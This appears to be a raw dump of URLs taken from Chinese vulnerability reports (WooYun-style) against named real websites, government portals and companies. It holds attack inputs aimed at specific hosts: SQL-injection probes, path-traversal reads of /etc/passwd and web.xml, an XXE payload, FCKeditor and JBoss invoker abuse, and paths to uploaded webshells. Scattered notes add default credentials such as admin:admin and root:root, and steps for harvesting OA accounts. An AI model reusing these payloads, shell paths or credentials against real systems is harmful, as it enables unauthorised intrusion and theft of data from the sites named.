https://www.wanda-gh.com/wcm/app/main.jsp https://github.com/lifang/FudanAppManage/blob/92c0b1de6e3ef1e6f927de348ef4b354ff90d017/src/main/resources/config.properties http://**.**.**.**/trunklogin/turkLogin/login.jsp http://club.mangocity.com/act/toptraveller/show.aspx?sw=xb1rUWl7';%20waitfor%20delay%20'0:0:0'%20--%20&type=1 http://**.**.**.**/ http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**:8070/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**:81/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 
http://**.**.**.**/model/TwoGradePage/Feedback.aspx?id=11343&openid=198 http://**.**.**.**:8080/wz12333net http://**.**.**.**:8080/wz12333net/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://**.**.**.**:8080/wz12333net/UserFiles/Image/wooyun.jsp http://**.**.**.**:8080/wz12333net/UserFiles/Image/foot.jsp https://**.**.**.**/nickflyer/osscms/blob/master/config.php http://**.**.**.**/admin.php http://**.**.**.**/admincp.php?action=models http://**.**.**.**/data/model/import_1443159707_qkYp9V/c.php https://github.com/songkang1/webc/blob/fd905971e03a2858c5749833a3c45edb48368b0f/App/Common/Conf/config.php https://github.com/songkang1/webc/blob/fd905971e03a2858c5749833a3c45edb48368b0f/DB/webc.sql http://irou.intime.com.cn:8380/supplier/jsp/login.jsp url:http://tj.fruitday.com www.qingmayun.com www.qingmayun.com www.qingmayun.com http://appbg.xiaoma.com/users/sign_up http://122.224.218.142:7070/supplier/jsp/index.jsp http://irou.intime.com.cn:8380/supplier/jsp/login.jsp http://**.**.**.**:8003/page/website/infonews/list?classid=34 http://**.**.**/cms/web/testsql.jsp_ http://**.**.**/cms/web/testsql.jsp_ http://**.**.**/bjutCms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/fsmcms/cms/web/testsql.jsp_ http://**.**.**/cms/cms/web/testsql.jsp_ http://**.**.**/fsmcms//cms/web/testsql.jsp_ http://**.**.**/cms/web/testsql.jsp http://wspx.91huayi.com http://**.**.**.**/link?url=219W2K-QvrqF35U0re8O5cr3lyV3YAohUj0iYw6FVWoSly9kNmH5DyPETtIlKao4WXAzfVI9Xiw6U1onvV4bX-JW8JNNcp6nm4PsooiIKl3 http://m.zufangzi.com/entrust/entrustController/entrustPage.do?code=20098899 http://**.**.**/web/zwdt/jjj.BjcxServlet_ http://**.**.**/scweb/web/zwdt/jjj.BjcxServlet_ http://**.**.**/web/zwdt/jjj.BjcxServlet 
http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/Webwsfw/Projectindex/?sb= http://**.**.**.**/bugs/wooyun-2010-063832 http://**.**.**.**/talent/upload.jsp http://old.noahedu.com/wenba/handle.php http://old.noahedu.com/w http://www.notedyy.com/vipchat/VerifyCodeServlet?var=clusterid http://www.notedyy.com/vipchat/servlet/upfile.do http://58.83.190.26/memadmin http://wxq.lefucn.com/weixin/ http://huodong.kuwo.cn/huodong/newact/admin.jsp http://**.**.**.**/dqgz_list/&newsCategoryId=12.html http://**.**.**.**/view/proxy_site.php?func=listAll&catalog=060404 http://**.**.**.** db0a954:12165c96687:-7ff7 http://bbs.midea.com/admin.php http://www.xuanhao.com/spxx/liantong.php?rd=-1&sr=-1&yy=-1&gl=-1&d=4&flbm=0105&hd=&jg=&sw= http://job.shangdu.com/hjlaowu.php?act=1&city_id=1&p=2 http://**.**.**.**/zh-cn/,如图所示: success:true,message:,data:{src:'/upfile/images/2015-9/25191949.php'},total:1,errors:''},访问shell地址,http://**.**.**.**//upfile/images/2015-9/25191949.php,如图所示: http://**.**.**.**/phpMyAdmin root:root,phpmyadmin权限为root,可以直接脱裤或进一步getshell http://**.**.**.**/Admin.php/网站后台admin:admin888直接登录,网站后台可以进行数据库备份下载或者进一步getshell。 http://mail.100msh.com http://**.**.**.**/index/Downloadnr.aspx?DID=25359 http://www.wooyun.org/bugs/wooyun-2013-034737 m.tuniu.com/svnInfo.php http://hl.pay.joy.cn/search/createtime/1.htm?Keyword=-1 https://m.chinaums.com/ http://m.chinaums.com:80/ E3C8BA7C9C3C71E347481E0390F20273:FG=1 http://**.**.**.**/account/login.action http://114.80.99.111/1.tar.gz http://114.80.99.111/ahero/ http://114.80.99.111/server/ http://**.**.**.**/order/orderstatus?ordernum=PO201509221357345734066 http://hr.acmcoder.com/xycloveManage admin:admin 
http://**.**.**.**/home.c http://**.**.**.**/c/ca/travel http://**.**.**.**/c/ca/mall/mall-search?page=1&sCat=1 http://**.**.**.**/wp-login.php http://**.**.**.**/c/ca/travel/travel-timetable jdbc:oracle:thin:@**.**.**.**:1521:oradb jdbc:oracle:thin:@**.**.**.**:1521:orcl http://**.**.**.**:8080/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/webapps/mgt/pilufile/pilu1398676666622.pdf http://**.**.**.**:8080/questionInves/pilupdf.jsp?url=/home/tomcat/apache-tomcat-6.0.35/webapps20150324.tar.gz http://**.**.**.**/ inurl:jyreg.php inurl:xyuserinfo.php http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/jylist.php?diqu= http://**.**.**.**/Appactivity/registration_login.aspx http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/download/ http://**.**.**.**:81/ http://**.**.**.** http://**.**.**.**/a.picauto?path=C:\Windows\win.ini http://**.**.**.**/public/a.picauto?path=C:\Windows\win.ini http://bbs.social-touch.com/forum.php http://**.**.**.**/searchresult http://www.haorc.com/dangyuan/search.asp?fl=44 http://www.haorc.com/zdyj/zdnew.asp?newtype=0601&ai_rows=13&ai_length=28&n=%27 http://121.34.249.229 http://121.34.249.229/scm/DaemonMail?operation=read&type=100&mailid=71267 http://121.34.249.229/scm/DaemonFileDownload?fileid=90374 http://121.34.249.229/scm/DaemonSCMUserVender?operation=set&venderid=000016&buid=19×tamp=1443240601506& http://121.34.249.229/scm/DaemonSCMVenderAdmin?focus=venderdiy&operation=list 
http://121.34.249.229/scm/DaemonSCMUserVender?operation=set&venderid=000014&buid=19×tamp=1443240601506& http://121.34.249.229/scm/DaemonSCMVenderAdmin?focus=venderdiy&operation=list http://122.224.183.4:80/jcms/interface/ldap/ldapconf.xml http://221.231.137.195/jcms/interface/ldap/ldapconf.xml http://202.108.199.114:80/jcms/interface/ldap/ldapconf.xml http://202.108.199.114/jcms/interface/ldap/ldapconf.xml http://6bur.cscec.com/jcms/interface/ldap/ldapconf.xml http://cengangpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://219.146.58.42/jcms/interface/ldap/ldapconf.xml http://cq.ea-spring.com/jcms/interface/ldap/ldapconf.xml http://caiyuan.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://bingmei.sdcdc.cn/jcms/interface/ldap/ldapconf.xml http://3bur.cscec.com/jcms/interface/ldap/ldapconf.xml http://csbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://changspcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://blbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://cz.anxiang.gov.cn/jcms/interface/ldap/ldapconf.xml http://chart.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml http://chengdpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://bj.clubchinachic.com/jcms/interface/ldap/ldapconf.xml http://dandong.xiangshan.gov.cn/jcms/interface/ldap/ldapconf.xml http://dayupcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml http://chdj.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp?state=C&result=T&loginuser=e2V1Z3UdA2sNaw==&loginpass=DEIBRXBGcUQOM3g0 http://tieba.baidu.com/f/search/ures?ie=utf-8&un=USERNAME http://**.**.**.**/index.php http://**.**.**.**/index.php?mid=7&&action=showArticle&&articleid=102 http://**.**.**.**/index.php?mid=7 http://tuan.mangocity.com/product/productlistbysearch.aspx?queryStrL=%E8%9C%9C%E6%9C%88 http://**.**.**.**/weblogic/jdbc-data-source 
xmlns:sec="http://**.**.**.**/weblogic/security xmlns:wls="http://**.**.**.**/weblogic/security/wls xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLocation="http://**.**.**.**/weblogic/jdbc-data-source http://**.**.**.**/weblogic/jdbc-data-source/1.0/jdbc-data-source.xsd http://**.**.**.**:80/ http://**.**.**.**:8080/hmfwzx/web/zxgtMore.jsp?type=0 http://**.**.**.**:8080/hmfwzx/web/sub_event.jsp?subid=63e8579358594a5295e64625a4178844 http://**.**.**.**:8080/hmfwzx/web/bssx.jsp?eventid=4DFC90A5C9ED444BA32910969709F5C6 http://**.**.**.**:8080/hmfwzx/web/shouye_2.jsp?subjectid=B64E207FF5A745EA94F8A5B56040DE53 http://**.**.**.**:8080/hmfwzx/web/zxgtMore.jsp?subjectid=65749ed5b4ff4d378624e761aa120dec&type=0 http://**.**.**.**:8080/hmfwzx/web/zixunList.jsp?subjectid=65749ed5b4ff4d378624e761aa120dec http://**.**.**.**:8080/hmfwzx/web/bssx.jsp?docId=DFE17B9412F149A2B604B3B82006C0ED&eventid=4DFC90A5C9ED444BA32910969709F5C6 http://**.**.**.**/zncs/gh/news/ShowMessage.asp?fid=169 http://**.**.**.**/zncs/gh/news/ShowMessage.asp?fid=135 http://**.**.**.**/admin/ http://111.205.37.193:8001/console http://111.205.37.193:8001/wpp/foot.jsp http://www.ccamls.org/newslist.php?pid=771 http://www.ccamls.org/newslist.php?pid=771+xor+1=2 http://www.ccamls.org/newslist.php?pid=771+xor+1=1 http://hk5.midea.com http://www.dfss-club.com/jl/see.jsp?id=16 http://**.**.**.**:8070/Api/Account/SignInAndGetUserPlus http://**.**.**.** http://**.**.**.**/admin/index.htm http://**.**.**.**/admin/usermgr/user.do http://**.**.**.**/admin/usermgr/user.do?act=to_logon www.zhuzhu56.com、www.zhuzhuqs.com、www.zzvan.com。 https://github.com/zhuzhu56/zzqs-testing/blob/dacb6318d64700b75964e4458046136093bd0246/%E8%B4%A6%E5%8F%B7.txt,上层目录也有很多敏感信息的。 zhuzhuqs.com/1qazXCVB zhuzhuqs.com/direction_2014 zhuzhuqs.com/Direction_2014 zhuzhuqs.com/Direction_2015 http://www.xinnet.com/ www.400cx.com http://**.**.**.**/fgw/mailboxlistcon.php?did=1001%27&wid=119 http://pm.made-in-china.com/resin-doc 
http://202.104.30.82/login/login.do http://**.**.**.**/page.aspx?id=1 http://**.**.**.**/sys/loginInput.action,广东省茂名市国土资源局OA系统,验证码可重用,用常用用户名和弱口令123456可获得一个有效账号,登陆后可查看通讯录,将通讯录再做成字典跑,可获得28个有效账号,登陆之后,可查看内部敏感文件,发送短信等。 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/jcpu/ http://**.**.**.**/ http://**.**.**.**/cjcmmte/ http://**.**.**.**/jrs/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/kcdz/ http://**.**.**.**/dzyktcn/ http://**.**.**.**/ http://**.**.**.**/ch/reader/inner_key_query_article_list.aspx http://**.**.**.**/ch/reader/key_query_article_list.aspx http://livina.dongfeng-nissan.com.cn/spadmin/gift_excel.php?EndTime=1&GifeType=1&ok=1&SatTime=1 http://overseas.5i5j.com:80/ http://**.**.**.**/ztpd/detail.phtml?path=%D6%D8%D2%AA%D7%A8%CC%E2&catId=001002:016002&newId=13527&big5=0 http://**.**.**.**/view.asp?id=7013 http://wooyun.org/bugs/wooyun-2015-0143603 http://www.zhuzhu56.com/)注册一个柱柱签收的用户,然后找回密码,收到的邮件是这样的: http://219.143.38.228/ http://oa.gyzq.com.cn/,登陆时会提示详细的用户出错信息 http://www.yueyueshu.com/product.php?catid=2 http://baoxian.jbw666.com:8001/admin/login.jsp http://www.ie.zjut.edu.cn/htm/kexue/lunwenview.asp?id=167 http://14.116.76.23:7001/tw/ http://14.116.76.23:7001/console/login/LoginForm.jsp http://14.116.76.23:7001/ma/ma1.jsp jdbc:oracle:thin:@localhost:1521:orcl http://club.womai.com/home.php?mod=space&uid=15071296&do=album&picid=9125 http://**.**.**.**/ListLeaseHouseInfoSearch.aspx?a=1&area=a03&area2=%25u4e00%25u4e2d http://jywb.zjol.com.cn/detail.aspx?id=20150811165803d32e http://eps.csrcj.com http://eps.csrcj.com/custom/GroupNewsList.aspx?companyId=&child=&buyGroupid=1302&groupId=151 http://eps.csrcj.com/library/editornew/Editor/temp.asp http://im.midea.com/,下载个美信ios移动客户端,登录处无验证码和密码错误次数限制,但是用户名是什么格式呢? 
https://vpn.midea.com/sslvpn/Login/Login https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doShowproductpage&productTab=downloads&product=175&version=VPN%20Clients%20for%20Windows#r60hfa02 http://**.**.**.**:80/ http://114.251.242.182/ http://**.**.**.**/support/digital_cameras/software_series.php?catid=13 http://wan.meizu.com http://wan.meizu.com/praise/users/{此处为uuid}?version=20882&page=2 http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2 http://member.360hitao.com/Store_Rebates/azIndexInside.aspx?Letter=O http://member.360hitao.com/store_rebates/store/storedetailcoupon.aspx?cat=36075162379976567 http://**.**.**.**/login/ http://**.**.**.**/downy.php?id=32&c1=220+xor+1=1 http://**.**.**.**/downy.php?id=32&c1=220+xor+1=2 http://5000.midea.com.cn http://5000.midea.com.cn/midea/login.do http://**.**.**.**/logout.do http://**.**.**.**/app/sltd/?c=main&a=detail&id=11837 http://kdjyxk.post.gov.cn/company/reg.jsp?provinceId=0 http://kdjyxk.post.gov.cn http://www.ftchinese.com/m/marketing/intelligence.html?type=interactive&id=4468 http://**.**.**.**/Login.aspx http://**.**.**.**/Site/article/type/28/id/51.html http://**.**.**.**/admin/ http://**.**.**.**/user/passwd.txt http://**.**.**.**/**.**.**.**.txt http://bug.codoon.com/just_test/ http://bug.codoon.com/admin/ SITE:http://account.pcjoy.cn http://**.**.**.**/do/tools/student.html?id=100000000361661 http://www.changan-mazda.com.cn/search?q=Mazda3%20AXELA&t=97 http://www.changan-mazda.com.cn/news/index?page=1&year=2015 http://mail.neusoft.edu.cn/extmail/cgi/index.cgi http://mail.neusoft.edu.cn/ http://iwatchome.tom.com/Wiki_style.php?w2_id=261&page=1 http://iwatchome.tom.com/Wiki_style_content.php?keyword=&w3_id=7 http://iwatch.tom.com/Wiki_style.php?w2_id=261&page=1 http://**.**.**.**/bugs/wooyun-2015-0129375 http://**.**.**.**/snsite/sn_user.do?method=editForm&userid=3 http://**.**.**.**/Article_zs.asp?ClassID=4 http://**.**.**.**/Admin_Index.asp 
http://**.**.**.**/admin/database/article.mdb http://**.**.**.**:8086/newswebsite/admin/ http://**.**.**.**:8086/newswebsite/uploads/1122.php UserName:netcenterali http://sap.hismarttv.com http://sap.hismarttv.com/?detail=1&id=308039 http://adnew.adimg.jctrans.com/ADClick.aspx?id=12117&tp=0&url=/CQmVplXX+MKvQ7ZSxYvYHUZtsw3ae+gIOLb9Ej4agVfyVVT4JN+e/d2yjVnMN05 http://106.38.193.164/phpmyadmin/ http://202.104.30.95/web/rdlogin.jsp http://202.104.30.95:8080/web/SubmitLogin.do http://www.sinotrans.com/vc/vc/style/opr_copycode.jsp?id=1 http://interface.api.haodai.com/capi/sys/up_push_code?os_type=1&appid=2&imei=A0000000000000&app_version=27000&auth_tms=20150927122749&auth_did=218372&auth_dsig=7e63707f4c2c385c&auth_uid=402888&auth_usig=c28be912f3a53c23&pushcode=ed0e046ea6e40d71a4ba375cc010decd http://**.**.**.**:88/OpenPublicCourse.aspx?cid= http://**.**.**.**:808/OpenPublicCourse.aspx?cid= http://newlife.shangdu.com:80/ http://alog.cnfol.com/browserinfo.php http://**.**.**.**:8001 https://github.com/jiangkunwei/dc/blob/9778fb5f182a0dde6f36cf95bdfc8279eb74ec88/config/config.php http://cabin.airchina.com.cn/cwzb/fileDownload?FilePath=../../../../../../../../../../../../etc/passwd&FileName=a.txt http://cabin.airchina.com.cn/cwzb/fileDownload?FilePath=../../../../../../../../../../../../etc/nail.rc&FileName=a.txt http://www.netway.net.cn/jianjie.php,如图所示: http://www.netway.net.cn/chanpin.php?pro_id=5,如图所示: http://www.netway.net.cn/chanpin.php?pro_id=6",存在注入,如图所示: http://www.netway.net.cn/chanpin.php?pro_id=6 http://www.netway.net.cn/chanpin.php?pro_id=6 http://account.wzdai.com/register.shtml http://www.icampus.ren/ http://www.yunda156.com/ http://120.24.234.112:81 http://**.**.**.**/list.asp?id=85 http://**.**.**.**/admin/login.asp http://**.**.**.**/we/admin_login.asp http://**.**.**.**/UploadFile/201592874533138.asp http://58.83.190.179/memadmin/index.php?action=set.con http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**//_ 
http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://121.35.248.249:9001 http://121.35.248.249:9002//invoker/JMXInvokerServlet system:type=ServerInfo http://121.35.248.249:9002//invoker/JMXInvokerServlet system:type=ServerInfo http://121.35.248.249:9002//invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://121.35.248.249:9002/myname/wy.jsp http://**.**.**.**/oep/tchlist.action http://**.**.**.**/oep/app/ http://**.**.**.**/oep/app/ttadd.action http://**.**.**.**/oep/resource/ckeditor/uploader/upload/images/fil http://202.104.30.152:8011/MideaServiceMain.asmx tem:alterGuid tem:alterGuid http://www.ttkdex.com.hk/Page/Logistics/InspectMessage.aspx?StorageNumber= http://b2b.cr-power.com/ http://b2b.cr-power.com/ispweb/file/downLoad.do?fileIds=259311 http://b2b.cr-power.com/ispweb/file/downLoad.do?fileIds=10001 http://www.takee.com.cn/product/index/?id=45 http://bbs.tingyun.com/uc_server/shell.php http://202.104.30.152 http://wmcrm.baidu.com/crm?qt=neworderlist http://wmcrm.baidu.com/crm?qt=neworderlist http://wmcrm.baidu.com/crm?qt=neworderlist http://tc.homelink.com.cn http://tc.homelink.com.cn/Academy/AcademyCertificateCourseReg03.aspx http://tc.homelink.com.cn/Academy/AcademyCertificateCourseReg05.aspx ps:wooyun.aspx为测试所用 http://nts.koolearn.com/ http://eshop.airchina.com.cn//Draw/Draw_listAja http://**.**.**.**/weixin/weixin/binding!bindUser.action http://**.**.**.**/weixin/weixin/binding!bindUser.action http://**.**.**.**/weixin/weixin/binding!bindUser.action http://www.9666.cn/passRestore/showPassRestore.action http://218.205.171.101:8080/ http://ess.cninsure.net http://ess.cninsure.net:80/ http://mail.zzvcom.com/php/report/include/config.inc http://**.**.**.**/ http://**.**.**.**/Data/ http://**.**.**.**/sdgp2014/regist/expappend_file.jsp?ids=-1&varnum= http://club.mangocity.com/tongyou/default.aspx?btime=01/01/1967&dep=1&deptk=&des=-1 jdbc:oracle:thin:@**.**.**.**:1521:gags 
http://s.p.qq.com/pub/jump?d=AAAR6KES&_wv=1027)我已经打电话让工作人员提示危险网站了(电脑用户发链接可以看到危险,可是用分享的方式,丝毫没有任何影响),手机分享也是压根不拦截,因为这个是腾讯官方的地址。 https://github.com/zsming1963/old-foundation/blob/3c6d2c71a062fada50ea4bb0d543360e131ff958/donate/payback_.php http://o.appchina.com http://**.**.**.**/sys/loginInput.action 没有关闭和禁用测试帐号 http://topic.ddmap.com/?c=5 http://interface.api.haodai.com/capi/user/updateAvatar http://www.haodai.com/xdyManager.txt) http://**.**.**.**:8081/public/getIndexList.action http://**.**.**.**/cx/index.htm http://**.**.**.**/cx/jsj00.html http://**.**.**.**/cx/qgjsj70/index.htm https://github.com/morvenyang/clican-pluto/blob/d30302456c61da3ba913f06fb9844205ab2f9a1c/peacebird/doc/env.txt http://msg.shouhuobao.com:9090/ http://www.sxhtjs.com.cn/down.asp?id=762 http://bslog.biostime.com.cn/dealerPlatform/ http://yjs.sicnu.edu.cn/ds_search.asp?xsdm=013 http://zjc.sicnu.edu.cn/solicit_2014_sys/solicit_2014_sys_login.aspx http://zjc.sicnu.edu.cn/solicit_2014_sys/solicit2014_infor_enrollment.aspx http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_info.aspx http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_filepost.aspx http://**.**.**.**/ http://**.**.**.**/NTRSJ/BasicInfoCmd?appRecId=102881 http://**.**.**.**/NTRSJ/BasicInfoCmd?appRecId=212048 http://**.**.**.**/ http://**.**.**.**/c6/jhsoft.web.workflat/index.aspx# http://124.224.178.205/license!getExpireDateOfDays.action http://huodong.xin.com:8888/ajax/top_load/ data:ename=nanjing http://**.**.**.**/oa/acegi_login_new.jsp http://**.**.**.**/ inurl:hireNetPortal/search_zp_position.do http://**.**.**.**/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../ http://**.**.**.**:8080/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../ 
http://**.**.**.**/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../ http://t.cn/Ry99OhO http://is.gd/pvv8pu http://www.56688.cc/%E6%B5%B7%E5%8F%A3%E7%BD%91%E4%BA%A4%E6%8E%A5%E6%80%BB%E8%A1%A8.xls http://**.**.**.**/appliance/applClient/ http://career.ruc.edu.cn/article_show2.asp?id=2935 http://100.baihe.com/guest.php?uid=7682&bp=33 https://**.**.**.**:8000/ https://**.**.**.**:8000/common/upload.jsp http://**.**.**.**:9080/vehweb/getsysparaminfo?action=Hd&glbm=420100&xzqh=420104&hpzl=02 http://**.**.**.**:9080/vehweb/navigator http://m.125job.com/hangye/index?funbig=2174 ftp://202.120.46.12/ ftp://202.120.39.248/ ftp://202.120.53.237/ inurl:/OA/HX_LOGIN.ASP http://086.mobi/OA/HX_Login.asp http://**.**.**.**/oa/HX_GetPassWord.asp http://**.**.**.**/sytxmz/question.asp http://**.**.**.**/job_sendpws.aspx?username= http://www.92bjw.com/post.php?catid=154 https://116.228.70.212:8443 http://yiyuan.120ask.com/emarketing/zxyy.html http://app.120.net/,下个快速问医生app http://www.ghzq.com.cn/ubsiServlet\?xml\=%3C%21DOCTYPE%20foo%20%5B%3C%21ENTITY%20%20xxe%20SYSTEM%20%22file%3A%2f%2f%2f%2f%22%3E%5D%3E%3Cubsi%20service%3D%22service%22%20method%3D%22method%22%3E%3Cobject%20type%3D%22Integer%22%3E%26xxe%3B%3C%2fobject%3E%3C%2fubsi%3E%20 http://**.**.**.**/yysjqslsearch,输入手机号后查询受理结果 http://**.**.**.** http://**.**.**.**/jqsl.html http://**.**.**.**/zxfw1.html http://ext.120ask.com/,登陆处参数username存在POST注入,含大量会员和医生信息。 http://www.piccamc.com/ http://www.piccamc.com/news/NewsAttachmentAction.do?method=downloadStaticFile&filename=/../WEB-INF/web.xml inurl:NewShow.asp?byID= http://221.212.156.44/wd/query.php?username=123 http://mboxspace.kuwo.cn/ks/KgeChorusBang?board_id=103 http://mboxspace.kuwo.cn/ks/KgeChorusBang?board_id=103 http://activity.wzdai.com/appShow/pages/index.shtml http://app.wzdai.com/app/user/appCZMM.html http://**.**.**.**/page/user/register.jsp 
http://a.120ask.com/login?from=aHR0cDovL3d3dy4xMjBhc2suY29tLw== http://huodong.uuu9.com/Runtime/Cache/2011.php http://e.now.cn/auctions/auctions_search_list.net?bargain_bid=1&bargain_buy=1&Domain=1&fprice=1&pagenum=1&search_domain1%5b0%5d=5&search_domain1%5b1%5d=6&search_domain2=1&search_domainSite=1&search_maxLength=200&search_minLength=1&search_show=1&search_style=0&search_undomain=&STRFLAG=0&tprice=1 http://210.51.195.4 http://oa.hrsec.com.cn/login/Login.jsp?logintype=1 http://mail0.hrsec.com.cn/ http://**.**.**.**/admin/login.asp http://106.37.188.186/huoweixin/idnumberquery!first.action http://106.37.188.186/huoweixin/ma.jsp http://wooyun.org/bugs/wooyun-2015-0133830 jdbc:oracle:thin:@**.**.**.**:1521:zqhf http://**.**.**.**/pub/search/search_fj.asp?id=1&mid=28%20and%201=@@version http://**.**.**.**/pub/search/search_fj.asp?id=1&mid=28%20and%201=@@version http://**.**.**.**/pub/search/search_fj.asp?id=1&mid=28%20and%201=@@version http://**.**.**.**/pub/search/search_video.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_video.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_video.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_audio.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_audio.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_audio.asp?id=862&mid=17%20and%201=@@version http://**.**.**.**/pub/search/search_graph_dl.asp?id=85&mid=4&yh=1 http://**.**.**.**/pub/search/search_graph_view.asp?id=85&mid=4&yh=1 http://**.**.**.**/pub/search/search_fj_view.asp?id=80&mid=4&yh=1 http://**.**.**.**/pub/search/search_fj_dl.asp?id=80&mid=4&yh=1 http://**.**.**.**/pub/search/search_vf.asp?id=7&mid=15 http://**.**.**.**/pub/search/search_fj_dl.asp?id=2&mid=28&yh=1 http://**.**.**.**/pub/search/search_vf.asp?id=7&mid=15 http://**.**.**.**/pub/search/search_graph_view.asp?id=7&mid=15&yh=1 
http://**.**.**.**/pub/search/search_graph_dl.asp?id=7&mid=15&yh=1 http://**.**.**.**/pub/search/search_fj_view.asp?id=2&mid=28&yh=1 http://**.**.**.**/pub/search/search_fj_dl.asp?id=19&mid=11&yh=1 http://**.**.**.**/pub/search/search_fj_view.asp?id=19&mid=11&yh=1 http://**.**.**.**/pub/search/search_graph_view.asp?id=102&mid=14&yh=1 http://**.**.**.**/pub/search/search_graph_dl.asp?id=102&mid=14&yh=1 http://**.**.**.**/pub/search/search_vf.asp?id=7&mid=15 http://www.vcanbio.com/company_videodata_detail.aspx?id=1 http://**.**.**.**/find/search.aspx?key=a&type=title http://talents.neusoft.com http://jk.dahe.cn/ http://jk.dahe.cn/robots.txt http://jk.dahe.cn/robots.txt/1.php http://10.**.*.32:8080/kwok http://sms.3etone.com http://www.eoemarket.com/优亿市场注册 http://fuwu.sogou.com/ http://www.lagou.com/ http://**.**.**.**/indexoffice.do http://ts.chexiang.com/ https://pan.chexiang.com http://119.61.4.107:8090/introduce http://**.**.**.**/nxspecial/ admin:admin https://m.pcjinrong.com/footer/get?type=1 https://m.pcjinrong.com/footer/get?type=1 http://wx.pcjinrong.com/footer/get?type=1 http://wx.pcjinrong.com/footer/get?type=1 http://talents.neusoft.com/webdesign/homepage.do http://www.mynj.cn http://58.213.141.215:8080/mynj/conferencePCSIndex1.do http://guahao.qingdaonews.com/YyYisheng/index/keyword/a*.html http://**.**.**.** http://**.**.**.**/xiangmuchaxun.aspx?channel_id=NTg=&endtime=2015-09-28&guapai_time=2011-08-01&&paixu_id=MQ==&parent_id=MA==&xiangmu_name=kndtfxbw http://**.**.**.**/news.php?cate_id=5 http://**.**.**.**/bugs/wooyun-2014-083964 http://**.**.**.**/zjpb http://**.**.**.**/dzztb_pb/login.aspx http://**.**.**.**/ruianpb http://**.**.**.**:85/sqkpb http://**.**.**.**/gxlzpb http://**.**.**.**/lypbnew http://**.**.**.**/siyangpb http://mail.airchinacargo.com/ www.51kudai.com/index.php?user&email=1'%22&q=action/check_email http://rdscm.midea.com.cn:7008/index.jsp http://www.lvmama.com/lvyou/dest_index/ajaxGetWeather 
